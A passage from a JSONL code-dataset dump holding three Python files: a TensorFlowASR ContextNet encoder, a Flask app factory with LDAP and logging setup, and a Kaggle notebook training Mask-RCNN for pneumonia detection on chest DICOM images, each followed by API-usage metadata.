"usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 344, "usage_type": "name"}]} +{"seq_id": "44030322090", "text": "from typing import List\nimport tensorflow as tf\n\nfrom tensorflow_asr.utils import math_util\n\nL2 = tf.keras.regularizers.l2(1e-6)\n\n\ndef get_activation(\n activation: str = \"silu\",\n):\n activation = activation.lower()\n if activation in [\"silu\", \"swish\"]:\n return tf.nn.swish\n elif activation == \"relu\":\n return tf.nn.relu\n elif activation == \"linear\":\n return tf.keras.activations.linear\n else:\n raise ValueError(\"activation must be either 'silu', 'swish', 'relu' or 'linear'\")\n\n\nclass Reshape(tf.keras.layers.Layer):\n def call(self, inputs):\n return math_util.merge_two_last_dims(inputs)\n\n\nclass ConvModule(tf.keras.layers.Layer):\n def __init__(\n self,\n kernel_size: int = 3,\n strides: int = 1,\n filters: int = 256,\n activation: str = \"silu\",\n kernel_regularizer=None,\n bias_regularizer=None,\n **kwargs,\n ):\n super(ConvModule, self).__init__(**kwargs)\n self.strides = strides\n self.conv = tf.keras.layers.SeparableConv1D(\n filters=filters,\n kernel_size=kernel_size,\n strides=strides,\n padding=\"same\",\n depthwise_regularizer=kernel_regularizer,\n pointwise_regularizer=kernel_regularizer,\n bias_regularizer=bias_regularizer,\n name=f\"{self.name}_conv\",\n )\n self.bn = tf.keras.layers.BatchNormalization(name=f\"{self.name}_bn\")\n self.activation = get_activation(activation)\n\n def call(\n self,\n inputs,\n training=False,\n **kwargs,\n ):\n outputs = self.conv(inputs, training=training)\n outputs = self.bn(outputs, training=training)\n outputs = self.activation(outputs)\n return outputs\n\n\nclass SEModule(tf.keras.layers.Layer):\n def __init__(\n self,\n kernel_size: int = 3,\n strides: int = 1,\n filters: int = 256,\n activation: str = \"silu\",\n kernel_regularizer=None,\n bias_regularizer=None,\n **kwargs,\n ):\n super(SEModule, self).__init__(**kwargs)\n self.conv = ConvModule(\n kernel_size=kernel_size,\n strides=strides,\n filters=filters,\n activation=activation,\n kernel_regularizer=kernel_regularizer,\n bias_regularizer=bias_regularizer,\n name=f\"{self.name}_conv_module\",\n )\n self.activation = get_activation(activation)\n self.fc1 = tf.keras.layers.Dense(filters // 8, name=f\"{self.name}_fc1\")\n self.fc2 = tf.keras.layers.Dense(filters, name=f\"{self.name}_fc2\")\n\n def call(\n self,\n inputs,\n training=False,\n **kwargs,\n ):\n features, input_length = inputs\n outputs = self.conv(features, training=training)\n\n se = tf.divide(tf.reduce_sum(outputs, axis=1), tf.expand_dims(tf.cast(input_length, dtype=outputs.dtype), axis=1))\n se = self.fc1(se, training=training)\n se = self.activation(se)\n se = self.fc2(se, training=training)\n se = self.activation(se)\n se = tf.nn.sigmoid(se)\n se = tf.expand_dims(se, axis=1)\n\n outputs = tf.multiply(outputs, se)\n return outputs\n\n\nclass ConvBlock(tf.keras.layers.Layer):\n def __init__(\n self,\n nlayers: int = 3,\n kernel_size: int = 3,\n filters: int = 256,\n strides: int = 1,\n residual: bool = True,\n activation: str = \"silu\",\n alpha: float = 1.0,\n kernel_regularizer=None,\n bias_regularizer=None,\n **kwargs,\n ):\n super(ConvBlock, self).__init__(**kwargs)\n\n self.dmodel = filters\n self.time_reduction_factor = strides\n filters = int(filters * alpha)\n\n self.convs = []\n for i in range(nlayers - 1):\n self.convs.append(\n ConvModule(\n kernel_size=kernel_size,\n strides=1,\n filters=filters,\n activation=activation,\n 
kernel_regularizer=kernel_regularizer,\n bias_regularizer=bias_regularizer,\n name=f\"{self.name}_conv_module_{i}\",\n )\n )\n\n self.last_conv = ConvModule(\n kernel_size=kernel_size,\n strides=strides,\n filters=filters,\n activation=activation,\n kernel_regularizer=kernel_regularizer,\n bias_regularizer=bias_regularizer,\n name=f\"{self.name}_conv_module_{nlayers - 1}\",\n )\n\n self.se = SEModule(\n kernel_size=kernel_size,\n strides=1,\n filters=filters,\n activation=activation,\n kernel_regularizer=kernel_regularizer,\n bias_regularizer=bias_regularizer,\n name=f\"{self.name}_se\",\n )\n\n self.residual = None\n if residual:\n self.residual = ConvModule(\n kernel_size=kernel_size,\n strides=strides,\n filters=filters,\n activation=\"linear\",\n kernel_regularizer=kernel_regularizer,\n bias_regularizer=bias_regularizer,\n name=f\"{self.name}_residual\",\n )\n\n self.activation = get_activation(activation)\n\n def call(\n self,\n inputs,\n training=False,\n **kwargs,\n ):\n features, input_length = inputs\n outputs = features\n for conv in self.convs:\n outputs = conv(outputs, training=training)\n outputs = self.last_conv(outputs, training=training)\n input_length = math_util.get_reduced_length(input_length, self.last_conv.strides)\n outputs = self.se([outputs, input_length], training=training)\n if self.residual is not None:\n res = self.residual(features, training=training)\n outputs = tf.add(outputs, res)\n outputs = self.activation(outputs)\n return outputs, input_length\n\n\nclass ContextNetEncoder(tf.keras.Model):\n def __init__(\n self,\n blocks: List[dict] = [],\n alpha: float = 1.0,\n kernel_regularizer=None,\n bias_regularizer=None,\n **kwargs,\n ):\n super(ContextNetEncoder, self).__init__(**kwargs)\n\n self.reshape = Reshape(name=f\"{self.name}_reshape\")\n\n self.blocks = []\n for i, config in enumerate(blocks):\n self.blocks.append(\n ConvBlock(\n **config,\n alpha=alpha,\n kernel_regularizer=kernel_regularizer,\n bias_regularizer=bias_regularizer,\n name=f\"{self.name}_block_{i}\",\n )\n )\n\n def call(\n self,\n inputs,\n training=False,\n **kwargs,\n ):\n outputs, input_length = inputs\n outputs = self.reshape(outputs)\n for block in self.blocks:\n outputs, input_length = block([outputs, input_length], training=training)\n return outputs\n", "repo_name": "TensorSpeech/TensorFlowASR", "sub_path": "tensorflow_asr/models/encoders/contextnet.py", "file_name": "contextnet.py", "file_ext": "py", "file_size_in_byte": 7082, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 877, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tensorflow.keras.regularizers.l2", "line_number": 6, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 6, "usage_type": "attribute"}, {"api_name": "tensorflow.nn", "line_number": 14, "usage_type": "attribute"}, {"api_name": "tensorflow.nn", "line_number": 16, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 18, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 23, "usage_type": "attribute"}, {"api_name": "tensorflow_asr.utils.math_util.merge_two_last_dims", "line_number": 25, "usage_type": "call"}, {"api_name": "tensorflow_asr.utils.math_util", "line_number": 25, "usage_type": "name"}, {"api_name": "tensorflow.keras", "line_number": 28, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.SeparableConv1D", "line_number": 41, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 41, "usage_type": "attribute"}, {"api_name": 
"tensorflow.keras.layers.BatchNormalization", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 51, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 66, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 88, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 88, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 89, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 89, "usage_type": "attribute"}, {"api_name": "tensorflow.divide", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.expand_dims", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.nn.sigmoid", "line_number": 105, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 105, "usage_type": "attribute"}, {"api_name": "tensorflow.expand_dims", "line_number": 106, "usage_type": "call"}, {"api_name": "tensorflow.multiply", "line_number": 108, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 112, "usage_type": "attribute"}, {"api_name": "tensorflow_asr.utils.math_util.get_reduced_length", "line_number": 191, "usage_type": "call"}, {"api_name": "tensorflow_asr.utils.math_util", "line_number": 191, "usage_type": "name"}, {"api_name": "tensorflow.add", "line_number": 195, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 200, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 203, "usage_type": "name"}]} +{"seq_id": "32921679262", "text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom logging.handlers import RotatingFileHandler\nfrom flask import Flask\nfrom flask.logging import default_handler\nfrom redap.core import ldap, db, migrate\n\n\ndef create_app(package_name, *args, **kwargs):\n app = Flask(package_name, *args, instance_relative_config=True, **kwargs)\n\n # Fetch settings from config file\n app.config.from_object('redap.settings.core')\n app.config.from_object('redap.settings.ldap')\n\n # Init flask-ldapconn extension\n ldap.init_app(app)\n\n # Init SQLAlchemy\n db.init_app(app)\n migrate.init_app(app, db)\n\n if app.config['ENV'] == 'production':\n formatter = logging.Formatter(app.config['LOG_FORMAT'])\n\n handler = RotatingFileHandler('logs/application.log', maxBytes=10000, backupCount=3)\n handler.setLevel(logging.INFO)\n handler.setFormatter(formatter)\n\n app.logger.setLevel(logging.INFO)\n app.logger.addHandler(handler)\n app.logger.removeHandler(default_handler)\n\n # Check for errors upon request teardown\n @app.teardown_request\n def log_errors(error):\n if error is None:\n return\n\n app.logger.error(\"An error occurred while handling the request\", error)\n\n return app\n", "repo_name": "rbw/redap", "sub_path": "redap/factory.py", "file_name": "factory.py", "file_ext": "py", "file_size_in_byte": 1249, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 27, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 11, "usage_type": "call"}, {"api_name": "redap.core.ldap.init_app", "line_number": 18, "usage_type": "call"}, {"api_name": "redap.core.ldap", "line_number": 18, "usage_type": "name"}, {"api_name": "redap.core.db.init_app", "line_number": 21, "usage_type": "call"}, {"api_name": "redap.core.db", "line_number": 21, 
"usage_type": "name"}, {"api_name": "redap.core.migrate.init_app", "line_number": 22, "usage_type": "call"}, {"api_name": "redap.core.db", "line_number": 22, "usage_type": "argument"}, {"api_name": "redap.core.migrate", "line_number": 22, "usage_type": "name"}, {"api_name": "logging.Formatter", "line_number": 25, "usage_type": "call"}, {"api_name": "logging.handlers.RotatingFileHandler", "line_number": 27, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 28, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.logging.default_handler", "line_number": 33, "usage_type": "argument"}]} +{"seq_id": "10148034345", "text": "import os \nimport sys\nimport random\nimport math\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nimport json\nimport pydicom\nfrom imgaug import augmenters as iaa\nfrom tqdm import tqdm\nimport pandas as pd \nimport glob \n\n# ### First: Install Kaggle API for download competition data.\n\n# In[ ]:\n\n\nDATA_DIR = '/kaggle/input'\n\n# Directory to save logs and trained model\nROOT_DIR = '/kaggle/working'\n\n# ### MD.ai Annotator \n# \n# Additionally, If you are interested in augmenting the existing annotations, you can use the MD.ai annotator to view DICOM images, and create annotatios to be exported. \n# MD.ai annotator project URL for the Kaggle dataset: https://public.md.ai/annotator/project/LxR6zdR2/workspace\n# \n# **Annotator features**\n# - The annotator can be used to view DICOM images and create image and exam level annotations.\n# - You can apply the annotator to filter by label, adjudicate annotations, and assign annotation tasks to your team.\n# - Notebooks can be built directly within the annotator for rapid model development.\n# - The data wrangling is abstracted away by the interface and by our MD.ai library.\n# - Simplifies image annotation in order to widen the participation in the futrue of medical image deep learning.\n# \n# The annotator allows you to create initial annotations, build and run models, modify/finetune the annotations based on predicted values, and repeat. \n# The MD.ai python client library implements functions to easily download images and annotations and to prepare the datasets used to train the model for classification. 
See the following example notebook for parsing annotations and training using MD.ai annotator: \n# https://github.com/mdai/ml-lessons/blob/master/lesson3-rsna-pneumonia-detection-mdai-client-lib.ipynb \n# - MD.ai URL: https://www.md.ai \n# - MD.ai documentation URL: https://docs.md.ai/\n\n# ### Install Matterport's Mask-RCNN model from github.\n# See the [Matterport's implementation of Mask-RCNN](https://github.com/matterport/Mask_RCNN).\n\n# In[ ]:\n\n\nos.chdir('Mask_RCNN')\n#!python setup.py -q install\n\n# In[ ]:\n\n\n# Import Mask RCNN\nsys.path.append(os.path.join(ROOT_DIR, 'Mask_RCNN')) # To find local version of the library\nfrom mrcnn.config import Config\nfrom mrcnn import utils\nimport mrcnn.model as modellib\nfrom mrcnn import visualize\nfrom mrcnn.model import log\n\n# In[ ]:\n\n\ntrain_dicom_dir = os.path.join(DATA_DIR, 'stage_1_train_images')\ntest_dicom_dir = os.path.join(DATA_DIR, 'stage_1_test_images')\n\n# ### Some setup functions and classes for Mask-RCNN\n# \n# - dicom_fps is a list of the dicom image path and filenames \n# - image_annotions is a dictionary of the annotations keyed by the filenames\n# - parsing the dataset returns a list of the image filenames and the annotations dictionary\n\n# In[ ]:\n\n\ndef get_dicom_fps(dicom_dir):\n dicom_fps = glob.glob(dicom_dir+'/'+'*.dcm')\n return list(set(dicom_fps))\n\ndef parse_dataset(dicom_dir, anns): \n image_fps = get_dicom_fps(dicom_dir)\n image_annotations = {fp: [] for fp in image_fps}\n for index, row in anns.iterrows(): \n fp = os.path.join(dicom_dir, row['patientId']+'.dcm')\n image_annotations[fp].append(row)\n return image_fps, image_annotations \n\n# In[ ]:\n\n\n# The following parameters have been selected to reduce running time for demonstration purposes \n# These are not optimal \n\nclass DetectorConfig(Config):\n \"\"\"Configuration for training pneumonia detection on the RSNA pneumonia dataset.\n Overrides values in the base Config class.\n \"\"\"\n \n # Give the configuration a recognizable name \n NAME = 'pneumonia'\n \n # Train on 1 GPU and 8 images per GPU. We can put multiple images on each\n # GPU because the images are small. Batch size is 8 (GPUs * images/GPU).\n GPU_COUNT = 1\n IMAGES_PER_GPU = 8 \n \n BACKBONE = 'resnet50'\n \n NUM_CLASSES = 2 # background + 1 pneumonia classes\n \n IMAGE_MIN_DIM = 256\n IMAGE_MAX_DIM = 256\n RPN_ANCHOR_SCALES = (32, 64, 128, 256)\n TRAIN_ROIS_PER_IMAGE = 32\n MAX_GT_INSTANCES = 3\n DETECTION_MAX_INSTANCES = 3\n DETECTION_MIN_CONFIDENCE = 0.9\n DETECTION_NMS_THRESHOLD = 0.1\n\n STEPS_PER_EPOCH = 100\n \nconfig = DetectorConfig()\nconfig.display()\n\n# In[ ]:\n\n\nclass DetectorDataset(utils.Dataset):\n \"\"\"Dataset class for training pneumonia detection on the RSNA pneumonia dataset.\n \"\"\"\n\n def __init__(self, image_fps, image_annotations, orig_height, orig_width):\n super().__init__(self)\n \n # Add classes\n self.add_class('pneumonia', 1, 'Lung Opacity')\n \n # add images \n for i, fp in enumerate(image_fps):\n annotations = image_annotations[fp]\n self.add_image('pneumonia', image_id=i, path=fp, \n annotations=annotations, orig_height=orig_height, orig_width=orig_width)\n \n def image_reference(self, image_id):\n info = self.image_info[image_id]\n return info['path']\n\n def load_image(self, image_id):\n info = self.image_info[image_id]\n fp = info['path']\n ds = pydicom.read_file(fp)\n image = ds.pixel_array\n # If grayscale. 
Convert to RGB for consistency.\n if len(image.shape) != 3 or image.shape[2] != 3:\n image = np.stack((image,) * 3, -1)\n return image\n\n def load_mask(self, image_id):\n info = self.image_info[image_id]\n annotations = info['annotations']\n count = len(annotations)\n if count == 0:\n mask = np.zeros((info['orig_height'], info['orig_width'], 1), dtype=np.uint8)\n class_ids = np.zeros((1,), dtype=np.int32)\n else:\n mask = np.zeros((info['orig_height'], info['orig_width'], count), dtype=np.uint8)\n class_ids = np.zeros((count,), dtype=np.int32)\n for i, a in enumerate(annotations):\n if a['Target'] == 1:\n x = int(a['x'])\n y = int(a['y'])\n w = int(a['width'])\n h = int(a['height'])\n mask_instance = mask[:, :, i].copy()\n cv2.rectangle(mask_instance, (x, y), (x+w, y+h), 255, -1)\n mask[:, :, i] = mask_instance\n class_ids[i] = 1\n return mask.astype(np.bool), class_ids.astype(np.int32)\n\n# ### Examine the annotation data, parse the dataset, and view dicom fields\n\n# In[ ]:\n\n\n# training dataset\nanns = pd.read_csv(os.path.join(DATA_DIR, 'stage_1_train_labels.csv'))\nanns.head()\n\n# In[ ]:\n\n\nimage_fps, image_annotations = parse_dataset(train_dicom_dir, anns=anns)\n\n# In[ ]:\n\n\nds = pydicom.read_file(image_fps[0]) # read dicom image from filepath \nimage = ds.pixel_array # get image array\n\n# In[ ]:\n\n\n# show dicom fields \nds\n\n# In[ ]:\n\n\n# Original DICOM image size: 1024 x 1024\nORIG_SIZE = 1024\n\n# ### Split the data into training and validation datasets\n# **Note: We have only used only a portion of the images for demonstration purposes. See comments below.**\n# \n# - To use all the images do: image_fps_list = list(image_fps)\n# - Or change the number of images from 100 to a custom number\n\n# In[ ]:\n\n\n######################################################################\n# Modify this line to use more or fewer images for training/validation. \n# To use all images, do: image_fps_list = list(image_fps)\nimage_fps_list = list(image_fps[:1000]) \n#####################################################################\n\n# split dataset into training vs. validation dataset \n# split ratio is set to 0.9 vs. 0.1 (train vs. validation, respectively)\nsorted(image_fps_list)\nrandom.seed(42)\nrandom.shuffle(image_fps_list)\n\nvalidation_split = 0.1\nsplit_index = int((1 - validation_split) * len(image_fps_list))\n\nimage_fps_train = image_fps_list[:split_index]\nimage_fps_val = image_fps_list[split_index:]\n\nprint(len(image_fps_train), len(image_fps_val))\n\n# ### Create and prepare the training dataset using the DetectorDataset class.\n\n# In[ ]:\n\n\n# prepare the training dataset\ndataset_train = DetectorDataset(image_fps_train, image_annotations, ORIG_SIZE, ORIG_SIZE)\ndataset_train.prepare()\n\n# ### Let's look at a sample annotation. We see a bounding box with (x, y) of the the top left corner as well as the width and height.\n\n# In[ ]:\n\n\n# Show annotation(s) for a DICOM image \ntest_fp = random.choice(image_fps_train)\nimage_annotations[test_fp]\n\n# In[ ]:\n\n\n# prepare the validation dataset\ndataset_val = DetectorDataset(image_fps_val, image_annotations, ORIG_SIZE, ORIG_SIZE)\ndataset_val.prepare()\n\n# ### Display a random image with bounding boxes\n\n# In[ ]:\n\n\n# Load and display random samples and their bounding boxes\n# Suggestion: Run this a few times to see different examples. 
\n\nimage_id = random.choice(dataset_train.image_ids)\nimage_fp = dataset_train.image_reference(image_id)\nimage = dataset_train.load_image(image_id)\nmask, class_ids = dataset_train.load_mask(image_id)\n\nprint(image.shape)\n\nplt.figure(figsize=(10, 10))\nplt.subplot(1, 2, 1)\nplt.imshow(image[:, :, 0], cmap='gray')\nplt.axis('off')\n\nplt.subplot(1, 2, 2)\nmasked = np.zeros(image.shape[:2])\nfor i in range(mask.shape[2]):\n masked += image[:, :, 0] * mask[:, :, i]\nplt.imshow(masked, cmap='gray')\nplt.axis('off')\n\nprint(image_fp)\nprint(class_ids)\n\n# In[ ]:\n\n\nmodel = modellib.MaskRCNN(mode='training', config=config, model_dir=ROOT_DIR)\n\n# ### Image Augmentation. Try finetuning some variables to custom values\n\n# In[ ]:\n\n\n# Image augmentation \naugmentation = iaa.SomeOf((0, 1), [\n iaa.Fliplr(0.5),\n iaa.Affine(\n scale={\"x\": (0.8, 1.2), \"y\": (0.8, 1.2)},\n translate_percent={\"x\": (-0.2, 0.2), \"y\": (-0.2, 0.2)},\n rotate=(-25, 25),\n shear=(-8, 8)\n ),\n iaa.Multiply((0.9, 1.1))\n])\n\n# ### Now it's time to train the model. Note that training even a basic model can take a few hours. \n# \n# Note: the following model is for demonstration purpose only. We have limited the training to one epoch, and have set nominal values for the Detector Configuration to reduce run-time. \n# \n# - dataset_train and dataset_val are derived from DetectorDataset \n# - DetectorDataset loads images from image filenames and masks from the annotation data\n# - model is Mask-RCNN\n\n# In[ ]:\n\n\nNUM_EPOCHS = 1\n\n# Train Mask-RCNN Model \nimport warnings \nwarnings.filterwarnings(\"ignore\")\nmodel.train(dataset_train, dataset_val, \n learning_rate=config.LEARNING_RATE, \n epochs=NUM_EPOCHS, \n layers='all',\n augmentation=augmentation)\n\n# In[ ]:\n\n\n# select trained model \ndir_names = next(os.walk(model.model_dir))[1]\nkey = config.NAME.lower()\ndir_names = filter(lambda f: f.startswith(key), dir_names)\ndir_names = sorted(dir_names)\n\nif not dir_names:\n import errno\n raise FileNotFoundError(\n errno.ENOENT,\n \"Could not find model directory under {}\".format(self.model_dir))\n \nfps = []\n# Pick last directory\nfor d in dir_names: \n dir_name = os.path.join(model.model_dir, d)\n # Find the last checkpoint\n checkpoints = next(os.walk(dir_name))[2]\n checkpoints = filter(lambda f: f.startswith(\"mask_rcnn\"), checkpoints)\n checkpoints = sorted(checkpoints)\n if not checkpoints:\n print('No weight files in {}'.format(dir_name))\n else: \n \n checkpoint = os.path.join(dir_name, checkpoints[-1])\n fps.append(checkpoint)\n\nmodel_path = sorted(fps)[-1]\nprint('Found model {}'.format(model_path))\n\n# In[ ]:\n\n\nclass InferenceConfig(DetectorConfig):\n GPU_COUNT = 1\n IMAGES_PER_GPU = 1\n\ninference_config = InferenceConfig()\n\n# Recreate the model in inference mode\nmodel = modellib.MaskRCNN(mode='inference', \n config=inference_config,\n model_dir=ROOT_DIR)\n\n# Load trained weights (fill in path to trained weights here)\nassert model_path != \"\", \"Provide path to trained weights\"\nprint(\"Loading weights from \", model_path)\nmodel.load_weights(model_path, by_name=True)\n\n# In[ ]:\n\n\n# set color for class\ndef get_colors_for_class_ids(class_ids):\n colors = []\n for class_id in class_ids:\n if class_id == 1:\n colors.append((.941, .204, .204))\n return colors\n\n# ### How does the predicted box compared to the expected value? Let's use the validation dataset to check. \n# \n# Note that we trained only one epoch for **demonstration purposes ONLY**. 
You might be able to improve performance running more epochs. \n\n# In[ ]:\n\n\n# Show few example of ground truth vs. predictions on the validation dataset \ndataset = dataset_val\nfig = plt.figure(figsize=(10, 30))\n\nfor i in range(4):\n\n image_id = random.choice(dataset.image_ids)\n \n original_image, image_meta, gt_class_id, gt_bbox, gt_mask =\\\n modellib.load_image_gt(dataset_val, inference_config, \n image_id, use_mini_mask=False)\n \n print(original_image.shape)\n plt.subplot(6, 2, 2*i + 1)\n visualize.display_instances(original_image, gt_bbox, gt_mask, gt_class_id, \n dataset.class_names,\n colors=get_colors_for_class_ids(gt_class_id), ax=fig.axes[-1])\n \n plt.subplot(6, 2, 2*i + 2)\n results = model.detect([original_image]) #, verbose=1)\n r = results[0]\n visualize.display_instances(original_image, r['rois'], r['masks'], r['class_ids'], \n dataset.class_names, r['scores'], \n colors=get_colors_for_class_ids(r['class_ids']), ax=fig.axes[-1])\n\n# In[ ]:\n\n\n# Get filenames of test dataset DICOM images\ntest_image_fps = get_dicom_fps(test_dicom_dir)\n\n# ### Final steps - Create the submission file\n\n# In[ ]:\n\n\n# Make predictions on test images, write out sample submission \ndef predict(image_fps, filepath='submission.csv', min_conf=0.95): \n \n # assume square image\n resize_factor = ORIG_SIZE / config.IMAGE_SHAPE[0]\n #resize_factor = ORIG_SIZE \n with open(filepath, 'w') as file:\n for image_id in tqdm(image_fps): \n ds = pydicom.read_file(image_id)\n image = ds.pixel_array\n # If grayscale. Convert to RGB for consistency.\n if len(image.shape) != 3 or image.shape[2] != 3:\n image = np.stack((image,) * 3, -1) \n image, window, scale, padding, crop = utils.resize_image(\n image,\n min_dim=config.IMAGE_MIN_DIM,\n min_scale=config.IMAGE_MIN_SCALE,\n max_dim=config.IMAGE_MAX_DIM,\n mode=config.IMAGE_RESIZE_MODE)\n \n patient_id = os.path.splitext(os.path.basename(image_id))[0]\n\n results = model.detect([image])\n r = results[0]\n\n out_str = \"\"\n out_str += patient_id \n out_str += \",\"\n assert( len(r['rois']) == len(r['class_ids']) == len(r['scores']) )\n if len(r['rois']) == 0: \n pass\n else: \n num_instances = len(r['rois'])\n \n for i in range(num_instances): \n if r['scores'][i] > min_conf: \n out_str += ' '\n out_str += str(round(r['scores'][i], 2))\n out_str += ' '\n\n # x1, y1, width, height \n x1 = r['rois'][i][1]\n y1 = r['rois'][i][0]\n width = r['rois'][i][3] - x1 \n height = r['rois'][i][2] - y1 \n bboxes_str = \"{} {} {} {}\".format(x1*resize_factor, y1*resize_factor, \\\n width*resize_factor, height*resize_factor) \n# bboxes_str = \"{} {} {} {}\".format(x1, y1, \\\n# width, height)\n out_str += bboxes_str\n\n file.write(out_str+\"\\n\")\n\n# In[ ]:\n\n\n# predict only the first 50 entries\nsubmission_fp = os.path.join(ROOT_DIR, 'submission.csv')\nprint(submission_fp)\npredict(test_image_fps, filepath=submission_fp)\n\n# In[ ]:\n\n\noutput = pd.read_csv(submission_fp, names=['patientId', 'PredictionString'])\noutput.head(100)\n\n# In[ ]:\n\n\n## show submission.csv content\n#os.chdir(ROOT_DIR)\n#!cat submission.csv\n\n# In[ ]:\n\n\n# show a few test image detection example\ndef visualize(): \n image_id = random.choice(test_image_fps)\n ds = pydicom.read_file(image_id)\n \n # original image \n image = ds.pixel_array\n \n # assume square image \n resize_factor = ORIG_SIZE / config.IMAGE_SHAPE[0]\n \n # If grayscale. 
Convert to RGB for consistency.\n if len(image.shape) != 3 or image.shape[2] != 3:\n image = np.stack((image,) * 3, -1) \n resized_image, window, scale, padding, crop = utils.resize_image(\n image,\n min_dim=config.IMAGE_MIN_DIM,\n min_scale=config.IMAGE_MIN_SCALE,\n max_dim=config.IMAGE_MAX_DIM,\n mode=config.IMAGE_RESIZE_MODE)\n\n patient_id = os.path.splitext(os.path.basename(image_id))[0]\n print(patient_id)\n\n results = model.detect([resized_image])\n r = results[0]\n for bbox in r['rois']: \n print(bbox)\n x1 = int(bbox[1] * resize_factor)\n y1 = int(bbox[0] * resize_factor)\n x2 = int(bbox[3] * resize_factor)\n y2 = int(bbox[2] * resize_factor)\n cv2.rectangle(image, (x1,y1), (x2,y2), (77, 255, 9), 3, 1)\n width = x2 - x1 \n height = y2 - y1 \n print(\"x {} y {} h {} w {}\".format(x1, y1, width, height))\n plt.figure() \n plt.imshow(image, cmap=plt.cm.gist_gray)\n\nvisualize()\n\n# In[ ]:\n\n\n# remove files to allow committing (hit files limit otherwise)\n", "repo_name": "tetherless-world/CodeGraph", "sub_path": "kaggle/python_files/sample774.py", "file_name": "sample774.py", "file_ext": "py", "file_size_in_byte": 17459, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.chdir", "line_number": 49, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 56, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "mrcnn.config.Config", "line_number": 96, "usage_type": "name"}, {"api_name": "mrcnn.utils.Dataset", "line_number": 130, "usage_type": "attribute"}, {"api_name": "mrcnn.utils", "line_number": 130, "usage_type": "name"}, {"api_name": "pydicom.read_file", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 165, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 166, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 168, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 169, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 177, "usage_type": "call"}, {"api_name": "numpy.bool", "line_number": 180, "usage_type": "attribute"}, {"api_name": "numpy.int32", "line_number": 180, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 188, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 188, "usage_type": "call"}, {"api_name": "os.path", "line_number": 188, "usage_type": "attribute"}, {"api_name": 
"pydicom.read_file", "line_number": 199, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 232, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 233, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 258, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 276, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 283, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 283, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 284, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 284, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 285, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 285, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 286, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 286, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 288, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 288, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 289, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 292, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 292, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 293, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", 